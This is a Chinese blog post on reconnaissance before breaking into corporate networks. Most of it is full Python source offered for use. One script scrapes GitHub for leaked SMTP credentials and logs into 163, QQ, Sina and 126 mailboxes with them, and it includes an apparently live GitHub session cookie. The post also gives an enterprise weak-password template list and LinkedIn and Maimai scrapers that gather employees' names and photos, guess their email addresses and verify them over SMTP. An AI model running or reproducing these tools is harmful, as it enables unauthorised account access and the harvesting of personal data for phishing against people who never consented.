内网渗透系列:信息搜集方法小结2

前言

之前已经小结过一些方法:

本文与前两者相互补充,主要还是小结下尝试进入内网时(即还是更偏向于前渗透)的一些信息搜集方法

一、开源情报(OSINT)

1、whois/反查/相关资产

2、github敏感信息

(1)github邮箱密码爬取

爬取github上的邮箱密码,并验证,基于Python2
用法:python Nuggests.py 100 (100为页数最大一百页)

Mail_Modules.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import smtplib
"""支持126,qq,sina,163邮箱"""
def maillogin_163(username,password,url):
    smtp_host = "smtp.163.com"
    smtp_port = "25"
    smtp_user = username
    smtp_pass = password
    try:
        smtp = smtplib.SMTP()
        smtp.connect(smtp_host,smtp_port)
        smtp.login(smtp_user,smtp_pass)
        print 'Analysis :' + url
        print 'Loading 163mail Module'
        print smtp_user+':'+smtp_pass+'  Login OK!'
    except Exception:
        pass
def maillogin_qq(username,password,url):
    smtp_host = "smtp.qq.com"
    smtp_port = "25"
    smtp_user = username
    smtp_pass = password
    try:
        smtp = smtplib.SMTP()
        smtp.connect(smtp_host,smtp_port)
        smtp.login(smtp_user,smtp_pass)
        print 'Analysis :' + url
        print 'Loading qq mail Module'
        print smtp_user+':'+smtp_pass+'  Login OK!'
    except Exception:
        pass
def maillogin_sina(username,password,url):
    smtp_host = "smtp.sina.com"
    smtp_port = "25"
    smtp_user = username
    smtp_pass = password
    try:
        smtp = smtplib.SMTP()
        smtp.connect(smtp_host,smtp_port)
        smtp.login(smtp_user,smtp_pass)
        print 'Analysis :' + url
        print 'Loading Sina mail Module'
        print smtp_user+':'+smtp_pass+'  Login OK!'
    except Exception:
        pass
def maillogin_126(username,password,url):
    smtp_host = "smtp.126.com"
    smtp_port = "25"
    smtp_user = username
    smtp_pass = password
    try:
        smtp = smtplib.SMTP()
        smtp.connect(smtp_host,smtp_port)
        smtp.login(smtp_user,smtp_pass)
        print 'Analysis :' + url
        print 'Loading 126 mail Module'
        print smtp_user+':'+smtp_pass+'  Login OK!'
    except Exception:
        pass

Nuggests.py

#!/usr/bin/env python 
# -*- coding: utf-8 -*-

import requests,sys
from bs4 import BeautifulSoup
from Mail_Modules import maillogin_163,maillogin_qq,maillogin_sina,maillogin_126
global urllist
urllist = []

def mailfilter(list,mod):
    usern = ''
    password =''
    for url in list:
        try:
            page = requests.get(url).content

            page = page.split()

            for index in range(len(page)):
                if 'user' in page[index]:
                    usern = page[index+2].strip(',').replace("'","")
                #print user
                if 'pass' in page[index]:
                    password = page[index+2].strip(',').replace("'","")
                #print password
        except:
            pass
        if mod == '163':
            maillogin_163(usern,password,url)
        if mod == 'qq':
            maillogin_qq(usern,password,url)
        if mod == 'sina':
            maillogin_sina(usern,password,url)
        if mod == '126':
            maillogin_126(usern,password,url)

def read_page(keyword,pages):
    pages = int(pages)
    print 'Search Keyword : '+keyword
    print 'Scanning '+str(pages)+' pages from Github!'
    for page in range(pages):
        headers = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 115Browser/7.2.5'
        cookie = {"Cookie":"_octo=GH1.1.1911767667.1480641870; logged_in=yes; dotcom_user=menu88; _ga=GA1.2.1291948085.1480641870; tz=Asia%2FShanghai; _gh_sess=eyJzZXNzaW9uX2lkIjoiNWY4YTVkMTk3YzRhNzg3ZWEwYjM5OWUwZWNhNDY2ZWIiLCJjb250ZXh0IjoiLyIsInNweV9yZXBvIjoibWVudTg4L215cHVibGljIiwic3B5X3JlcG9fYXQiOjE0ODEyNDY5NDN9--170066295059ff1fc3d8b46b50d3c62847ac82eb; user_session=JA153nFX9QfOaFbu2vCdVLPuU_9_K9NvEO4mvMqZ4NaK3TjX; __Host-user_session_same_site=JA153nFX9QfOaFbu2vCdVLPuU_9_K9NvEO4mvMqZ4NaK3TjX"} #cookie换成自己github的
        url = 'https://github.com/search?l=PHP&p='+str(page)+'&q='+keyword+'&type=Code&utf8=%E2%9C%93'
        print '正在抓取第'+str(page)+'页!'
        pagecon = requests.get(url,cookies = cookie).content
        soup = BeautifulSoup(pagecon,"html.parser")
        for link in soup.find_all('a'):
            url = link.get('href')
            if 'blob' in url:
                url = url.split('#')[0]
                url = url.split('blob/')[0]+url.split('blob/')[1]
                urllist.append('https://raw.githubusercontent.com'+url)
pages = 5
#pages = sys.argv[1]
read_page('smtp+163.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'163')
urllist =[]
read_page('smtp+qq.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'qq')
urllist =[]
read_page('smtp+sina.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'sina')
urllist =[]
read_page('smtp+126.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'126')

(2)GSIL

止介大佬写的:https://github.com/FeeiCN/GSIL
近实时(15min)监控GitHub敏感信息泄露,并发送告警通知,基于Python3

(3)x-patrol

小米安全的:https://github.com/MiSecurity/x-patrol

比起前两个更完善,基于Go

3、google hacking

可参见:Google Hack 方法小结

二、企业密码字典

1、字典列表

github上的一些字典:

针对特定的厂商

['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!']

2、密码生成

(1)genpAss

中国特色的弱口令生成器,可以根据个人信息生成弱口令
原作者删掉了,https://github.com/test98123456/genpAss

(2)passmaker

https://github.com/bit4woo/passmaker
根据定制的规则来组合生成出密码字典,主要目标是针对企业,基于Python2

(3)pydictor

https://github.com/LandGrey/pydictor
可以生成各种字典,功能强大

三、从公共数据源获取信息

1、Link

https://github.com/mdsecactivebreach/LinkedInt

用法:

Providing you with Linkedin Intelligence
Author: Vincent Yiu (@vysec, @vysecurity)
Original version by @DisK0nn3cT
[*] Enter search Keywords (use quotes for more percise results)
"General Motors"

[*] Enter filename for output (exclude file extension)
generalmotors

[*] Filter by Company? (Y/N):
Y

[*] Specify a Company ID (Provide ID or leave blank to automate):


[*] Enter e-mail domain suffix (eg. contoso.com):
gm.com

[*] Select a prefix for e-mail generation (auto,full,firstlast,firstmlast,flast,first.last,fmlast):
auto

[*] Automaticly using Hunter IO to determine best Prefix
[!] {first}.{last}
[+] Found first.last prefix

源码:

# LinkedInt
# Scrapes LinkedIn without using LinkedIn API
# Original scraper by @DisK0nn3cT (https://github.com/DisK0nn3cT/linkedin-gatherer)
# Modified by @vysecurity
# - Additions:
# --- UI Updates
# --- Constrain to company filters
# --- Addition of Hunter for e-mail prediction


#!/usr/bin/python

import socket
import sys
import re
import time
import requests
import subprocess
import json
import argparse
import smtplib
import dns.resolver
import cookielib
import os
import urllib
import math
import urllib2
import string
from bs4 import BeautifulSoup
from thready import threaded

reload(sys)
sys.setdefaultencoding('utf-8')

""" Setup Argument Parameters """
parser = argparse.ArgumentParser(description='Discovery LinkedIn')
parser.add_argument('-u', '--keywords', help='Keywords to search')
parser.add_argument('-o', '--output', help='Output file (do not include extentions)')
args = parser.parse_args()
api_key = "" # Hunter API key
username = "" 	# enter username here
password = ""	# enter password here

if api_key == "" or username == "" or password == "":
        print "[!] Oops, you did not enter your api_key, username, or password in LinkedInt.py"
        sys.exit(0)

def login():
	cookie_filename = "cookies.txt"
	cookiejar = cookielib.MozillaCookieJar(cookie_filename)
	opener = urllib2.build_opener(urllib2.HTTPRedirectHandler(),urllib2.HTTPHandler(debuglevel=0),urllib2.HTTPSHandler(debuglevel=0),urllib2.HTTPCookieProcessor(cookiejar))
	page = loadPage(opener, "https://www.linkedin.com/")
	parse = BeautifulSoup(page, "html.parser")

	csrf = parse.find(id="loginCsrfParam-login")['value']
	
	login_data = urllib.urlencode({'session_key': username, 'session_password': password, 'loginCsrfParam': csrf})
	page = loadPage(opener,"https://www.linkedin.com/uas/login-submit", login_data)
	
	parse = BeautifulSoup(page, "html.parser")
	cookie = ""
	
	try:
		cookie = cookiejar._cookies['.www.linkedin.com']['/']['li_at'].value
	except:
		sys.exit(0)
	
	cookiejar.save()
	os.remove(cookie_filename)
	return cookie

def loadPage(client, url, data=None):
	try:
		response = client.open(url)
	except:
		print "[!] Cannot load main LinkedIn page"
	try:
		if data is not None:
			response = client.open(url, data)
		else:
			response = client.open(url)
		return ''.join(response.readlines())
	except:
		sys.exit(0)

def get_search():

    body = ""
    csv = []
    css = """<style>
    #employees {
        font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
        border-collapse: collapse;
        width: 100%;
    }
    #employees td, #employees th {
        border: 1px solid #ddd;
        padding: 8px;
    }
    #employees tr:nth-child(even){background-color: #f2f2f2;}
    #employees tr:hover {background-color: #ddd;}
    #employees th {
        padding-top: 12px;
        padding-bottom: 12px;
        text-align: left;
        background-color: #4CAF50;
        color: white;
    }
    </style>
    """

    header = """<center><table id=\"employees\">
             <tr>
             <th>Photo</th>
             <th>Name</th>
             <th>Possible Email:</th>
             <th>Job</th>
             <th>Location</th>
             </tr>
             """

    # Do we want to automatically get the company ID?


    if bCompany:
	    if bAuto:
	        # Automatic
	        # Grab from the URL 
	        companyID = 0
	        url = "https://www.linkedin.com/voyager/api/typeahead/hits?q=blended&query=%s" % search
	        headers = {'Csrf-Token':'ajax:0397788525211216808', 'X-RestLi-Protocol-Version':'2.0.0'}
	        cookies['JSESSIONID'] = 'ajax:0397788525211216808'
	        r = requests.get(url, cookies=cookies, headers=headers)
	        content = json.loads(r.text)
	        firstID = 0
	        for i in range(0,len(content['elements'])):
	        	try:
	        		companyID = content['elements'][i]['hitInfo']['com.linkedin.voyager.typeahead.TypeaheadCompany']['id']
	        		if firstID == 0:
	        			firstID = companyID
	        		print "[Notice] Found company ID: %s" % companyID
	        	except:
	        		continue
	        companyID = firstID
	        if companyID == 0:
	        	print "[WARNING] No valid company ID found in auto, please restart and find your own"
	    else:
	        # Don't auto, use the specified ID
	        companyID = bSpecific

	    print
	    
	    print "[*] Using company ID: %s" % companyID

	# Fetch the initial page to get results/page counts
    if bCompany == False:
        url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List()&keywords=%s&origin=OTHER&q=guided&start=0" % search
    else:
        url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List(v->PEOPLE,facetCurrentCompany->%s)&origin=OTHER&q=guided&start=0" % (companyID)
    
    print url
    
    headers = {'Csrf-Token':'ajax:0397788525211216808', 'X-RestLi-Protocol-Version':'2.0.0'}
    cookies['JSESSIONID'] = 'ajax:0397788525211216808'
    #print url
    r = requests.get(url, cookies=cookies, headers=headers)
    content = json.loads(r.text)
    data_total = content['elements'][0]['total']

    # Calculate pages off final results at 40 results/page
    pages = data_total / 40

    if pages == 0:
    	pages = 1

    if data_total % 40 == 0:
        # Becuase we count 0... Subtract a page if there are no left over results on the last page
        pages = pages - 1 

    if pages == 0: 
    	print "[!] Try to use quotes in the search name"
    	sys.exit(0)
    
    print "[*] %i Results Found" % data_total
    if data_total > 1000:
        pages = 25
        print "[*] LinkedIn only allows 1000 results. Refine keywords to capture all data"
    print "[*] Fetching %i Pages" % pages
    print

    for p in range(pages):
        # Request results for each page using the start offset
        if bCompany == False:
            url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List()&keywords=%s&origin=OTHER&q=guided&start=%i" % (search, p*40)
        else:
            url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List(v->PEOPLE,facetCurrentCompany->%s)&origin=OTHER&q=guided&start=%i" % (companyID, p*40)
        #print url
        r = requests.get(url, cookies=cookies, headers=headers)
        content = r.text.encode('UTF-8')
        content = json.loads(content)
        print "[*] Fetching page %i with %i results" % ((p),len(content['elements'][0]['elements']))
        for c in content['elements'][0]['elements']:
            if 'com.linkedin.voyager.search.SearchProfile' in c['hitInfo'] and c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['headless'] == False:
                try:
                    data_industry = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['industry']
                except:
                    data_industry = ""    
                data_firstname = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['firstName']
                data_lastname = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['lastName']
                data_slug = "https://www.linkedin.com/in/%s" % c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['publicIdentifier']
                data_occupation = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['occupation']
                data_location = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['location']
                try:
                    data_picture = "https://media.licdn.com/mpr/mpr/shrinknp_400_400%s" % c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['picture']['com.linkedin.voyager.common.MediaProcessorImage']['id']
                except:
                    print "[*] No picture found for %s %s, %s" % (data_firstname, data_lastname, data_occupation)
                    data_picture = ""

                # incase the last name is multi part, we will split it down

                parts = data_lastname.split()

                name = data_firstname + " " + data_lastname
                fname = ""
                mname = ""
                lname = ""

                if len(parts) == 1:
                    fname = data_firstname
                    mname = '?'
                    lname = parts[0]
                elif len(parts) == 2:
                    fname = data_firstname
                    mname = parts[0]
                    lname = parts[1]
                elif len(parts) >= 3:
                    fname = data_firstname
                    lname = parts[0]
                else:
                    fname = data_firstname
                    lname = '?'

                fname = re.sub('[^A-Za-z]+', '', fname)
                mname = re.sub('[^A-Za-z]+', '', mname)
                lname = re.sub('[^A-Za-z]+', '', lname)

                if len(fname) == 0 or len(lname) == 0:
                    # invalid user, let's move on, this person has a weird name
                    continue

                    #come here

                if prefix == 'full':
                    user = '{}{}{}'.format(fname, mname, lname)
                if prefix == 'firstlast':
                    user = '{}{}'.format(fname, lname)
                if prefix == 'firstmlast':
                    user = '{}{}{}'.format(fname, mname[0], lname)
                if prefix == 'flast':
                    user = '{}{}'.format(fname[0], lname)
                if prefix == 'first.last':
                    user = '{}.{}'.format(fname, lname)
                if prefix == 'fmlast':
                    user = '{}{}{}'.format(fname[0], mname[0], lname)
                if prefix == 'lastfirst':
                	user = '{}{}'.format(lname, fname)

                email = '{}@{}'.format(user, suffix)

                body += "<tr>" \
                    "<td><a href=\"%s\"><img src=\"%s\" width=200 height=200></a></td>" \
                    "<td><a href=\"%s\">%s</a></td>" \
                    "<td>%s</td>" \
                    "<td>%s</td>" \
                    "<td>%s</td>" \
                    "<a>" % (data_slug, data_picture, data_slug, name, email, data_occupation, data_location)
                if validateEmail(suffix,email):
                    csv.append('"%s","%s","%s","%s","%s", "%s"' % (data_firstname, data_lastname, name, email, data_occupation, data_location.replace(",",";")))
                foot = "</table></center>"
                f = open('{}.html'.format(outfile), 'wb')
                f.write(css)
                f.write(header)
                f.write(body)
                f.write(foot)
                f.close()
                f = open('{}.csv'.format(outfile), 'wb')
                f.writelines('\n'.join(csv))
                f.close()
            else:
                print "[!] Headless profile found. Skipping"
        print

def validateEmail(domain,email):
    """
    Functionality and Code was adapted from the SimplyEmail Project: https://github.com/SimplySecurity/SimplyEmail
    """
    #Setting Variables
    UserAgent = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
    mxhost = ""
    FinalList = []
    hostname = socket.gethostname()
    
    #Getting MX Record
    MXRecord = []
    try:
        print ' [*] Attempting to resolve MX records!'
        answers = dns.resolver.query(domain, 'MX')
        for rdata in answers:
            data = {
                "Host": str(rdata.exchange),
                "Pref": int(rdata.preference),
            }
            MXRecord.append(data)
        # Now find the lowest value in the pref
        Newlist = sorted(MXRecord, key=lambda k: k['Pref'])
        # Set the MX record
        mxhost = Newlist[0]
        val = ' [*] MX Host: ' + str(mxhost['Host'])
        print val
    except Exception as e:
        error = ' [!] Failed to get MX record: ' + str(e)
        print error

    #Checking Email Address
    socket.setdefaulttimeout(10)
    server = smtplib.SMTP(timeout=10)
    server.set_debuglevel(0)
    try:
        print " [*] Checking for valid email: " + str(email)
        server.connect(mxhost['Host'])
        server.helo(hostname)
        server.mail('email@gmail.com')
        code,message = server.rcpt(str(email))
        server.quit()
    except Exception as e:
        print e
    
    if code == 250:
        #print "Valid Email Address Found: %s" % email
        return True
    else:
        #print "Email not valid %s" % email
        return False

def banner():
        with open('banner.txt', 'r') as f:
            data = f.read()

            print "\033[1;31m%s\033[0;0m" % data
            print "\033[1;34mProviding you with Linkedin Intelligence"
            print "\033[1;32mAuthor: Vincent Yiu (@vysec, @vysecurity)\033[0;0m"
            print "\033[1;32mOriginal version by @DisK0nn3cT\033[0;0m"

def authenticate():
    try:
    	a = login()
    	print a
        session = a
        if len(session) == 0:
            sys.exit("[!] Unable to login to LinkedIn.com")
        print "[*] Obtained new session: %s" % session
        cookies = dict(li_at=session)
    except Exception, e:
        sys.exit("[!] Could not authenticate to linkedin. %s" % e)
    return cookies

if __name__ == '__main__':
    banner()
    # Prompt user for data variables
    search = args.keywords if args.keywords!=None else raw_input("[*] Enter search Keywords (use quotes for more percise results)\n")
    print 
    outfile = args.output if args.output!=None else raw_input("[*] Enter filename for output (exclude file extension)\n")
    print 
    while True:
        bCompany = raw_input("[*] Filter by Company? (Y/N): \n")
        if bCompany.lower() == "y" or bCompany.lower() == "n":
            break
        else:
            print "[!] Incorrect choice"

    if bCompany.lower() == "y":
        bCompany = True
    else:
        bCompany = False

    bAuto = True
    bSpecific = 0
    prefix = ""
    suffix = ""

    print

    if bCompany:
	    while True:
	        bSpecific = raw_input("[*] Specify a Company ID (Provide ID or leave blank to automate): \n")
	        if bSpecific != "":
	            bAuto = False
	            if bSpecific != 0:
	                try:
	                    int(bSpecific)
	                    break
	                except:
	                    print "[!] Incorrect choice, the ID either has to be a number or blank"
	                
	            else:
	                print "[!] Incorrect choice, the ID either has to be a number or blank"
	        else:
	            bAuto = True
	            break

    print

    
    while True:
        suffix = raw_input("[*] Enter e-mail domain suffix (eg. contoso.com): \n")
        suffix = suffix.lower()
        if "." in suffix:
            break
        else:
            print "[!] Incorrect e-mail? There's no dot"

    print

    while True:
        prefix = raw_input("[*] Select a prefix for e-mail generation (auto,full,firstlast,firstmlast,flast,first.last,fmlast,lastfirst): \n")
        prefix = prefix.lower()
        print
        if prefix == "full" or prefix == "firstlast" or prefix == "firstmlast" or prefix == "flast" or prefix =="first" or prefix == "first.last" or prefix == "fmlast" or prefix == "lastfirst":
            break
        elif prefix == "auto":
            #if auto prefix then we want to use hunter IO to find it.
            print "[*] Automaticly using Hunter IO to determine best Prefix"
            url = "https://hunter.io/trial/v2/domain-search?offset=0&domain=%s&format=json" % suffix
            r = requests.get(url)
            content = json.loads(r.text)
            if "status" in content:
                print "[!] Rate limited by Hunter IO trial"
                url = "https://api.hunter.io/v2/domain-search?domain=%s&api_key=%s" % (suffix, api_key)
                #print url
                r = requests.get(url)
                content = json.loads(r.text)
                if "status" in content:
                    print "[!] Rate limited by Hunter IO Key"
                    continue
            #print content
            prefix = content['data']['pattern']
            print "[!] %s" % prefix
            if prefix:
                prefix = prefix.replace("{","").replace("}", "")
                if prefix == "full" or prefix == "firstlast" or prefix == "firstmlast" or prefix == "flast" or prefix =="first" or prefix == "first.last" or prefix == "fmlast" or prefix == "lastfirst":
                    print "[+] Found %s prefix" % prefix
                    break
                else:
                    print "[!] Automatic prefix search failed, please insert a manual choice"
                    continue
            else:
                print "[!] Automatic prefix search failed, please insert a manual choice"
                continue
        else:
            print "[!] Incorrect choice, please select a value from (auto,full,firstlast,firstmlast,flast,first.last,fmlast)"

    print 


    
    # URL Encode for the querystring
    search = urllib.quote_plus(search)
    cookies = authenticate()
  
    
    # Initialize Scraping
    get_search()

    print "[+] Complete"

2、脉脉

https://github.com/Ridter/Mailget

用法:

usage: Mailget.py [-h] [-d DOMAIN] [-cn COMNAME] [-o OUTPUT] [-pr PREFIX]

Discovery Maimai

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        The domain want to search
  -cn COMNAME, --comname COMNAME
                        The company name(example:饿了么)
  -o OUTPUT, --output OUTPUT
                        Output file (do not include extentions)
  -pr PREFIX, --prefix PREFIX
                        Select a prefix for e-mail generation (auto,full,first
                        last,firstmlast,flast,first.last,fmlast,lastfirst)

源码

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import pinyin
import requests
import json
import argparse
import sys
from urllib import unquote
import csv
import codecs
import re
reload(sys)
sys.setdefaultencoding("utf-8")

#设置账号密码及hunter的api key
api_key = ""  # Hunter API key
pa = ""  # enter pa, example:+86
phone = "" 	# enter username here
password = ""  # enter password here

parser = argparse.ArgumentParser(description='Discovery Maimai')
parser.add_argument('-d', '--domain', help='The domain want to search')
parser.add_argument('-cn', '--comname',
                    help='The company name(example:饿了么)')
parser.add_argument(
    '-o', '--output', help='Output file (do not include extentions)')
parser.add_argument('-pr', '--prefix', default='auto',
                    help='Select a prefix for e-mail generation (auto,full,firstlast,firstmlast,flast,first.last,fmlast,lastfirst)')
args = parser.parse_args()
domain = args.domain
outname = args.output
comname = args.comname
prefixinput = args.prefix
prefix = ""


#HTML CSS
HTML_CSS = '''
<!-- CSS goes in the document HEAD or added to your external stylesheet -->
<style type="text/css">
table.gridtable {
	font-family: verdana,arial,sans-serif;
	font-size:11px;
	color:#333333;
	border-width: 1px;
	border-color: #666666;
	border-collapse: collapse;
}
table.gridtable th {
	border-width: 1px;
	padding: 8px;
	border-style: solid;
	border-color: #666666;
	background-color: #dedede;
}
table.gridtable td {
	border-width: 1px;
	padding: 8px;
	border-style: solid;
	border-color: #666666;
	background-color: #ffffff;
}
</style>
<!-- Table goes in the document BODY -->
<table class="gridtable">
<tr><th>头像</th><th>姓名</th><th>邮箱</th><th>职位</th><th>地点</th></tr>
'''

HTML_END = "</table>"
HTML_BODY = ""
CSV_DATA = []
logo = '''
                _  _               _   
  /\/\    __ _ (_)| |  __ _   ___ | |_ 
 /    \  / _` || || | / _` | / _ \| __|
/ /\/\ \| (_| || || || (_| ||  __/| |_ 
\/    \/ \__,_||_||_| \__, | \___| \__|
                      |___/            
'''
#检查是否包含汉字
def check_contain_chinese(check_str):
    for ch in check_str.decode('utf-8'):
        if u'\u4e00' <= ch <= u'\u9fff':
            return True
    return False

#汉字转换拼音并进行格式转换
def Nametopinyin(name):
    try:
        if check_contain_chinese(name):
            match = re.search('[A-Za-z0-9]+', name)
            if match:
                return None,None,None
            else:
                name.replace(' ', '')
                if len(name)>9:
                    last = pinyin.get(name[0:6], format='strip')
                    mname = pinyin.get(name[6:9],format='strip')
                    first = pinyin.get(name[9:], format='strip')
                elif len(name) > 6:
                    last = pinyin.get(name[0:3], format='strip')
                    mname = pinyin.get(name[3:6], format='strip')
                    first = pinyin.get(name[6:], format='strip')
                else:
                    last = pinyin.get(name[0:3], format='strip')
                    mname = ""
                    first = pinyin.get(name[3:], format='strip')
                return last, mname, first 
        else:
            return name,None,None
    except:
        return None,None,None
#获取邮箱格式
def getprefix(prefix,domain):
        prefix = prefix.lower()
        domain = domain.lower()
        if prefix == "full" or prefix == "firstlast" or prefix == "firstmlast" or prefix == "flast" or prefix == "first" or prefix == "first.last" or prefix == "fmlast" or prefix == "lastfirst":
            print "[*] use input prefix for e-mail generation"
            return prefix
        elif prefix == "auto":
            #自动获取邮箱前缀类型。
            print "[*] Automaticly using Hunter IO to determine best Prefix of \"{}\"".format(domain)
            url = "https://hunter.io/trial/v2/domain-search?offset=0&domain=%s&format=json" % domain
            r = requests.get(url)
            content = json.loads(r.text)
            if "status" in content:
                print "[!] Rate limited by Hunter IO trial"
                url = "https://api.hunter.io/v2/domain-search?domain=%s&api_key=%s" % (
                    domain, api_key)
                #print url
                r = requests.get(url)
                content = json.loads(r.text)
                if "status" in content:
                    print "[!] Rate limited by Hunter IO Key"
            #print content
            prefix = content['data']['pattern']
            print "[!] %s" % prefix
            if prefix:
                prefix = prefix.replace("{", "").replace("}", "")
                if prefix == "full" or prefix == "firstlast" or prefix == "firstmlast" or prefix == "flast" or prefix == "first" or prefix == "first.last" or prefix == "fmlast" or prefix == "lastfirst":
                    print "[+] Found %s prefix" % prefix
                    return prefix
                else:
                    print "[!] Automatic prefix search failed, please insert a manual choice"
            else:
                print "[!] Automatic prefix search failed, please insert a manual choice"
        else:
            print "[!] Incorrect choice, please select a value from (auto,full,firstlast,firstmlast,flast,first.last,fmlast)"
        return None

#脉脉自动登录
def maimailogin(pa,phone,password):
    try:
        session = requests.session()
        login_data={
            'm': phone,
            'p': password,
            'to':'https://maimai.cn/im/',
            'pa': pa
        }
        session.post('https://acc.maimai.cn/login',data=login_data)
        return session
    except:
        print "[-] Login error!"
        exit(0)

#获取账号信息
def getmailinfo(session, comname):
    comname = unquote(comname)
    page = 0
    try:
        while True:
            contactUrl = 'https://maimai.cn/search/contacts?count=5000&page={}&query=&dist=0&company={}&forcomp=1&searchTokens=&highlight=false&school=&me=&webcname=&webcid=&jsononly=1'.format(page,comname)
            res = session.get(contactUrl).text
            jsonObj = json.loads(res)
            contacts = jsonObj['data']['contacts']
            print "[*] Get the {} page of data..".format(page+1)
            handledata(contacts)
            page = page + 1
            if len(contacts) == 0:
                break
    except:
        print "[-] Get data error !"
            
#处理账号信息
def handledata(data):
    for content in data:
        user =""
        name = content['contact']['name']
        avatar = content['contact']['avatar']
        loc = content['contact']['loc']
        compos = content['contact']['compos']
        #print name, avatar, loc, compos
        name = name.encode('utf-8')
        lname, mname, fname = Nametopinyin(name)
        if fname != None:
            if prefix == "full":
                user = '{}{}{}'.format(mname,fname,lname)
            if prefix == "firstlast":
                user = '{}{}{}'.format(mname,fname,lname)
            if prefix == "firstmlast":
                if len(mname) == 0:
                    user = '{}{}{}'.format(mname, fname, lname)
                else:
                    user = '{}{}{}'.format(mname[0],fname, lname)
            if prefix == "flast":
                user = '{}{}'.format(fname[0], lname)
            if prefix == "first.last":
                user = '{}{}.{}'.format(mname,fname,lname)
            if prefix == "fmlast":
                if len(mname) == 0:
                    user = '{}{}{}'.format(mname, fname[0], lname)
                else:
                    user = '{}{}{}'.format(mname[0], fname[0], lname)
            if prefix == "lastfirst":
                user = '{}{}{}'.format(lname,mname,fname)
        elif lname!= None:
            user = lname
        if user !="":
            mail = "{}@{}".format(user,domain)
            writetofile(avatar, mail, name, compos, loc, outname)

#存储信息
def writetofile(avatar, mail, name, compos, loc, outname):
    global HTML_BODY,CSV_DATA
    CSV_TMP = name, compos, loc, mail
    CSV_DATA.append(CSV_TMP)
    HTML_TMP = "<tr><td><img src=\"{}\" width=50 height=50></td><td>{}</td><td>{}</td><td>{}</td><td>{}</td></tr>\n".format(avatar, name, mail, compos, loc)
    HTML_BODY = HTML_BODY+HTML_TMP

def main():
    print logo
    if len(api_key) == 0 or len(phone) == 0 or len(password) == 0 or len(pa)==0:
        print "[!] Please config the file!"
        exit(0)
    if domain == None:
        print "[!] Please input the domain name!"
        exit(0)
    if outname == None:
        print "[!] Please input the outfile name!"
        exit(0)
    if comname == None:
        print "[!] Please input the company name!"
        exit(0)
    global prefix
    prefix = getprefix(prefixinput, domain)
    if prefix == None:
        exit(0)
    print "[*] Trying to login Maimai."
    session =maimailogin(pa, phone, password)
    if session:
        print "[+] Login success ! Begin to get mails !"
    getmailinfo(session, comname)
    #写文件到HTML
    print "[*] Writing HTML Report to {}.html".format(outname)
    html = open('{}.html'.format(outname), 'a+')
    htmldata = HTML_CSS+HTML_BODY+HTML_END
    html.write(htmldata)
    html.close()
    #写文件到csv
    print "[*] Writing CSV Report to {}.csv".format(outname)
    f = open('{}.csv'.format(outname), 'a+')
    f.write(codecs.BOM_UTF8)
    w = csv.writer(f, quoting=csv.QUOTE_NONNUMERIC)
    for line in CSV_DATA:
        w.writerow(line)
    f.close()
    print "[+] Done !"

if __name__ == '__main__':
    main()

3、多源

https://github.com/laramies/theHarvester
功能超强,覆盖大量公共数据源

四、外部信息扫描

1、子域名爆破工具

2、在线子域名查询

结语

好些工具很强大

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值